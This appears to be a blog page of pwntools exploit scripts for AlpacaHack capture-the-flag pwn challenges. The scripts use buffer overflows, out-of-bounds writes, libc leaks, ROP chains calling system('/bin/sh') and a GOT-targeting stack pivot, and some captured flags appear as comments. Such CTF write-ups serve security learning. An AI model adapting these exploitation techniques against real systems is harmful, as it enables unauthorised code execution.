dplastico

I love pwn challenges from alpacahack I try to do one challenge everytime I can 💖

Echo

#!/usr/bin/env python3

from pwn import *

elf = ELF("./echo_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b echo
continue
'''

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 51069)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
size = 0x80000000 
data = b"A"*0x110
data += p64(0xcafebabe)
data += p64(elf.sym.win)
sla(b"Size: ", bc(size))
sla(b"Data: ", data)
#========= interactive ====================
r.interactive()

Inbound

#!/usr/bin/env python3

from pwn import *

elf = ELF("./inbound_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b main
continue
'''
def start():
    if args.REMOTE:
        return remote("34.170.146.252", 8749)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
idx = -14
value = elf.sym.win

sla(b"index: ", bc(idx))
sleep(1)
sla(b"value: ", bc(value))

#========= interactive ====================
r.interactive()

Before Write

#!/usr/bin/env python3

from pwn import *

elf = ELF("./chall_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 18940)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

payload = b"A"*0x20
payload += p64(0xcafebabe)
payload += p64(elf.sym.win)
sla(b"value: ", payload)

#========= interactive ====================
r.interactive()

CatCPY

Love thsi one hehe

#!/usr/bin/env python3

from pwn import *

elf = ELF("./catcpy_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 55594)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
payload = b'Y'*8
payload += b"A"*(255-len(payload))
sla(b">", b"2")
sla(b"Data: ", payload)

payload = b"C"*30
payload += p8(0)
sla(b">", b"2")
sla(b"Data: ", payload)

payload = b"D"*15
payload += p8(0)
sla(b">", b"2")
sla(b"Data: ", payload)

payload = b"Y"*11
payload += p64(elf.sym.win)
sla(b">", b"2")
sla(b"Data: ", payload)

#get a shell
sla(b">", b"0")

#========= interactive ====================
r.interactive()

HEX ECHO

#!/usr/bin/env python3

from pwn import *

elf = ELF("./hexecho_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.35.so")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b hexecho
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 7297)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
#Leak

rop = ROP(elf)

# Define the payload list
payloads = [0x4141414141414141] * 0x20 + [0xdeadbeef]  # 0x100/8 = 0x20
payloads2 = [0xdeadbeef, rop.find_gadget(["ret"])[0], elf.sym.main] 

# Convert each integer to a full 8-byte (16 hex digit) zero-padded string in little-endian order
payload_hex_list = ["".join(reversed([f"{p:016X}"[i:i+2] for i in range(0, 16, 2)])) for p in payloads]
payload_hex_list2 = ["".join(reversed([f"{p:016X}"[i:i+2] for i in range(0, 16, 2)])) for p in payloads2]

# Concatenate all payloads into one long string
payload_str = "".join(payload_hex_list)
payload_str2 = "".join(payload_hex_list2)

# Calculate total size in bytes
size = len(payload_str) // 2 
size2 = len(payload_str2) // 2
skipsize = 8

total_size = size + size2 + skipsize + 32

sla(b"Size: ", bc(total_size))
rcu(b"Data (hex): ")

# Send each two-character hex chunk
for i in range(0, len(payload_str), 2):
    sl(payload_str[i:i+2].encode())  # Send in byte format

# Send canary separator
for _ in range(8):
    sl(b"-")

# Send second payload in little-endian format
for i in range(0, len(payload_str2), 2):
    sl(payload_str2[i:i+2].encode())  # Send in byte format

for _ in range(32):
    sl(b"-")

rcu(b"Received: ")
leak = r.recvline().split(b" ")
leak = b"".join(leak[296:302])
leak = int(b"".join([leak[i:i+2] for i in range(0, len(leak), 2)][::-1]),16)
logleak("leak", leak)
libc.address = leak - 0x29d90
libcbase()


# Exploit

rop = ROP(libc)
payloads = [0x4141414141414141] * 0x20 + [0xdeadbeef]  # 0x100/8 = 0x20
payloads2 = [0xdeadbeef,
rop.find_gadget(["pop rdi", "ret"])[0],
next(libc.search(b"/bin/sh")),
rop.find_gadget(["ret"])[0],
libc.sym.system
] 

# Convert each integer to a full 8-byte (16 hex digit) zero-padded string in little-endian order
payload_hex_list = ["".join(reversed([f"{p:016X}"[i:i+2] for i in range(0, 16, 2)])) for p in payloads]
payload_hex_list2 = ["".join(reversed([f"{p:016X}"[i:i+2] for i in range(0, 16, 2)])) for p in payloads2]

# Concatenate all payloads into one long string
payload_str = "".join(payload_hex_list)
payload_str2 = "".join(payload_hex_list2)

# Calculate total size in bytes
size = len(payload_str) // 2 
size2 = len(payload_str2) // 2
skipsize = 8

total_size = size + size2 + skipsize

sla(b"Size: ", bc(total_size))
rcu(b"Data (hex): ")

# Send each two-character hex chunk
for i in range(0, len(payload_str), 2):
    sl(payload_str[i:i+2].encode())  # Send in byte format

# Send canary separator
for _ in range(8):
    sl(b"-")

# Send second payload in little-endian format
for i in range(0, len(payload_str2), 2):
    sl(payload_str2[i:i+2].encode())  # Send in byte format


#========= interactive ====================
r.interactive()

Oyster

#!/usr/bin/env python3

from pwn import *

elf = ELF("./oyster_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b *main+208
continue
'''

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 54454)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

username = b"A"*(0x20-4)
sla(b"Username:", b"root")
password = p64(0)
sla(b"Password:", password)
#
#========= interactive ====================
r.interactive()
#Alpaca{wH4t_5h3L1f1Sh_d0_U_l1K3_7h3_B3s7?}

Write

#!/usr/bin/env python3

from pwn import *

elf = ELF("./chall_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b main
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 42691)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
index = b"-12"
sla(b"index: ", index)
win = 0x4011b6 #4198838
payload = b"004198838"
payload += b"A"*0x20
sla(b"value: ", payload)

#4198838000000000000000000001
#========= interactive ====================
r.interactive()

Wall

This one was hard :(

#!/usr/bin/env python3

from pwn import *
import sys

elf = ELF("./wall_patched", checksec=False)
libc = ELF("./libc.so.6",checksec=False)
ld = ELF("./ld-2.35.so",checksec=False)

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b *0x4011d4
continue
'''

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 52893)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
rop = ROP(elf)

ret = rop.find_gadget(["ret"])[0]

payload = p64(rop.find_gadget(["pop rbp", "ret"])[0])
payload += p64(elf.got.setbuf+0x80)
payload += p64(0x401196)#write gadget

message = p64(ret)*((4096//8)-(len(payload)//8))
message += payload


payload = p64(rop.find_gadget(["pop rbp", "ret"])[0])
payload += p64(elf.got.printf+0x80)
payload += p64(0x4011b1) #
#reto to message


name = p64(ret)*((128//8)-(len(payload)//8))
name += payload

#payload = b"XXXXXXXX"
#payload += b"BBBBBBBB"
#payload += b"C"*(128-len(payload))
while True:
    try:
        r = start()
        r.timeout = 0.5
        sla(b"Message: ", message)
        sla(b"What is your name? ", name)
        r.recvline()
        leak = rcu(b"Message from ", b":")
        rcu(b"\n")

        if b"\x7f" not in leak:  
            log.failure(f"nop!")
            r.close()
        else:
            leak = u64(leak.ljust(8,b"\x00"))
            libc.address = leak - libc.sym.printf
            libcbase()
            break
    except:
        log.failure("nop!")
        pass

            

payload = p64(libc.sym.system)
payload += p64(elf.sym.main)
payload += p64(0) * 6
payload += p64(libc.sym._IO_2_1_stdout_)
payload += p64(0x0)
payload += p64(next(libc.search(b"/bin/sh")))
payload += p64(0xdeadbeef)*((128//8)-(len(payload)//8))

sl(payload) 

#Alpaca{p1v0T1ng_t0_Bss_i5_tR1cKy_du3_7o_st4Ck_s1Z3_Lim17}

#========= interactive ====================
r.interactive()

Read-write

Nice one

#!/usr/bin/env python3

from pwn import *

elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.35.so")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b main
b printval
continue
'''

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 49987)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

rcu(b">")

def f_read(idx):
    idx = idx/8
    sl(b"1")
    sla(b"index: ",bc(idx))
    leak = int(r.recvline().strip())
    return leak
    rcu(b">")

def f_write(idx, value):
    idx = idx/8
    sl(b"2")
    sla(b"index: ",bc(idx))
    sa(b"value: ", bc(value))



 #libc leak
leak = f_read(-0x80)
logleak("libc leak", leak)

libc.address = leak - libc.sym.write
libcbase()
environ = libc.sym.environ
logleak("environ", environ)
#
#array = 0x404040
#environ-array = stack leak
stackleak = f_read((libc.sym.environ-0x404040))
logleak("stack leak", stackleak)

#ret = stackleak -0x120
f_write(stackleak-0x120-0x404040, elf.sym.win)


#========= interactive ====================
r.interactive()

Aush

#!/usr/bin/env python3

from pwn import *

elf = ELF("./aush_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
set follow-fork-mode parent
b *main + 229
continue
'''

def start():
    if args.REMOTE:
        return remote("34.170.146.252", 62609)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

username = b"A"*(416)
sa(b"Username: ", username)
sa(b"Password: ", b"A"*0x20+b"\x00"*(416-0x20))

#sla(b"Password: ", b"A"*0x20)
#========= interactive ====================
r.interactive()
#zer0pts{p0lLut3_7h3_3nv1r0nnnNNnnnNnnnnNNNnnNnnNn}